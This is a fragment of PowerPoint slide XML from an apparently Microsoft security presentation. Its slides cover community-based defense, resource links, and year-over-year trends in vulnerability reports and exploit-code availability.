          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1412875"/>
            <a:ext cx="9144000" cy="6469063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Microsoft: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Understands the threat landscape </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Expert security engineering &amp; response processes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>New Security Paradigm needed </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Community based defense</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Collaboration at all layers  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Microsoft driving change in the Ecosystem </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Engaging Customers around the world</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sharing expertise in Response and Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Innovative programs help customers and ISVs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Resources</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1412875"/>
            <a:ext cx="8382000" cy="2954655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/Presspass/press/2008/may08/05-20SCPCERTPR.mspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/security/msrc/mapp/overview.mspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>msvr@microsoft.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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370" name="Picture 2" descr="C:\Program Files\Microsoft Resource DVD Artwork\DVD_ART\BoxShots_Logos\MICROSOFT\Microsoft logo with new tagline reverse.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1503363" y="2879725"/>
            <a:ext cx="6137275" cy="1363663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="5867400"/>
            <a:ext cx="8382000" cy="784225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© 2007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900" b="1">
              <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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2900" y="2249488"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Security Ecosystem Trends</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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8"/>
            <a:ext cx="8382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Security Ecosystem Trends</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1412875"/>
            <a:ext cx="8562975" cy="4314825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Increased Number of Reported Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Increased Number of Affected Products</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Specialization and Tools: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Specialists – Vulnerabilities Miners, Exploit Writers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Sophisticated Tools </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Increasing Velocity: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>The Time from patch to exploit is shrinking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Money Economy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Widespread Malicious Attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Isolated &amp; Targeted Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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381000" y="230188"/>
            <a:ext cx="8382000" cy="1163395"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Vulnerability Reports </a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Year-over-year increase</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="16" name="Chart 15"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4572000" y="1655807"/>
          <a:ext cx="4572000" cy="4423718"/>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7" name="Chart 16"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="234779" y="2051222"/>
          <a:ext cx="4090086" cy="3527854"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
            <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>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8"/>
            <a:ext cx="8382000" cy="1828193"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Vulnerability Reports</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Comparative trends</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18435" name="Picture 65" descr="cooltools-shape"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358775" y="4070350"/>
            <a:ext cx="4233863" cy="2446338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Chart 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="496901" y="4183930"/>
          <a:ext cx="3981450" cy="2219325"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
            <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18437" name="Picture 65" descr="cooltools-shape"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4535488" y="1671638"/>
            <a:ext cx="4235450" cy="2446337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Chart 5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4662369" y="1784862"/>
          <a:ext cx="3981450" cy="2219325"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
            <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18439" name="Picture 65" descr="cooltools-shape"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4535488" y="4070350"/>
            <a:ext cx="4235450" cy="2446338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Chart 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4662369" y="4183931"/>
          <a:ext cx="3981450" cy="2219325"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
            <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18441" name="Picture 65" descr="cooltools-shape"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358775" y="1671638"/>
            <a:ext cx="4233863" cy="2446337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Chart 7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="485022" y="1784862"/>
          <a:ext cx="3981450" cy="2219325"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
            <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>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8"/>
            <a:ext cx="8382000" cy="1551194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000"/>
              <a:t>Microsoft Vulnerability Exploit Details</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4000"/>
            </a:br>
            <a:r>
              <a:rPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trends</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr sz="4000"/>
            </a:br>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="393700" y="5419725"/>
            <a:ext cx="8435975" cy="1233488"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="344488" indent="-344488" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>While the number of vulnerabilities continues to increase,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>the ratio of exploit code available for these vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>remains steady and is even on a slight decline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="727693" y="2862019"/>
            <a:ext cx="188686" cy="145143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:scene3d>
            <a:camera prst="orthographicFront" fov="0">
              <a:rot lat="0" lon="0" rev="0"/>
            </a:camera>
            <a:lightRig rig="glow" dir="t">
              <a:rot lat="0" lon="0" rev="6360000"/>
            </a:lightRig>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lIns="91436" tIns="45718" rIns="91436" bIns="45718" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="912813">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="050595"/>
                </a:outerShdw>
              </a:effectLst>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="727693" y="3155971"/>
            <a:ext cx="188686" cy="145143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:scene3d>
            <a:camera prst="orthographicFront" fov="0">
              <a:rot lat="0" lon="0" rev="0"/>
            </a:camera>
            <a:lightRig rig="glow" dir="t">
              <a:rot lat="0" lon="0" rev="6360000"/>
            </a:lightRig>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lIns="91436" tIns="45718" rIns="91436" bIns="45718" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="912813">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="050595"/>
                </a:outerShdw>
              </a:effectLst>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947738" y="2795588"/>
            <a:ext cx="1335087" cy="277812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947738" y="3089275"/>
            <a:ext cx="1592262" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Vulnerabilities where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Exploit Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>was available</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 41"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2766950" y="1721922"/>
            <a:ext cx="8228178" cy="5559819"/>
            <a:chOff x="3016332" y="1721922"/>
            <a:chExt cx="8228178" cy="5559819"/>
          </a:xfrm>
          <a:scene3d>
            <a:camera prst="perspectiveLeft"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3016332" y="1721922"/>
              <a:ext cx="5927766" cy="3360717"/>
              <a:chOff x="3016332" y="1721922"/>
              <a:chExt cx="5927766" cy="3360717"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Rectangle 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3016332" y="1721922"/>
                <a:ext cx="5705007" cy="3360717"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="bg1">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="74000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="5000"/>
                    </a:schemeClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="16200000" scaled="1"/>
                <a:tileRect/>
              </a:gradFill>
              <a:ln>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="none" w="med" len="med"/>
              </a:ln>
              <a:sp3d prstMaterial="flat">
                <a:bevelT w="95250" h="101600"/>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lIns="91436" tIns="45718" rIns="91436" bIns="45718" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" defTabSz="914099">
                  <a:defRPr/>
                </a:pPr>
